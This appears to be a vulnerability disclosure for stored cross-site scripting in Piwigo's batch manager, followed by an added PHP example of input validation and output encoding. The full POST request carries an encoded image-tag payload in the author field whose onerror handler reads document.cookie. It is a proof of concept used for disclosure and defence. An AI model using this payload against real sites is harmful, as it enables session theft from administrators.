Description:

In the single mode function of the Piwigo system, modifying the author parameter of the picture can cause persistent cross-site scripting.

Vulnerable Instances:

/admin.php?page=batch_manager&mode=unit

affected source code file

request

```
POST /admin.php?page=batch_manager&mode=unit HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 152
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/admin.php?page=batch_manager&mode=unit
Cookie: pwg_id=mof6jca30q9tr1qu48hhvqi143
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

element_ids=4&name-4=test&author-4=11111%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E11&date_creation-4=&level-4=0&description-4=&submit=Submit
```

suggestion

Restrict user input and output
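
An added example, not part of the original report and not Piwigo's own code: one way to apply the suggestion to the `author-4` value from the request above, checking it on input and HTML-encoding it on output. The helper names `validate_author` and `h`, the 255-byte limit and the `<td class="author">` markup are assumptions made for illustration.

```php
<?php
// Added example; validate_author() and h() are hypothetical helpers, not Piwigo functions.

// Form body copied from the request in the report.
$body = 'element_ids=4&name-4=test'
      . '&author-4=11111%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E11'
      . '&date_creation-4=&level-4=0&description-4=&submit=Submit';
parse_str($body, $post);   // URL-decodes the fields, as PHP does for $_POST

/**
 * Input side (assumed policy): an author is a short plain-text name.
 * Returns the trimmed value, or null when it must be refused.
 */
function validate_author(string $value): ?string
{
    $value = trim($value);
    if (strlen($value) > 255) {                       // assumed limit, in bytes
        return null;
    }
    if (preg_match('/[<>\x00-\x1F\x7F]/', $value)) {  // markup or control characters
        return null;
    }
    return $value;
}

/** Output side: encode for an HTML text node or a quoted attribute value. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$author = $post['author-4'];

// 1. Refuse the value before it is stored.
if (validate_author($author) === null) {
    echo "author-4 refused: not stored\n";
}

// 2. Encode on every render, which also covers rows saved before the input check existed.
echo '<td class="author">' . h($author) . "</td>\n";
```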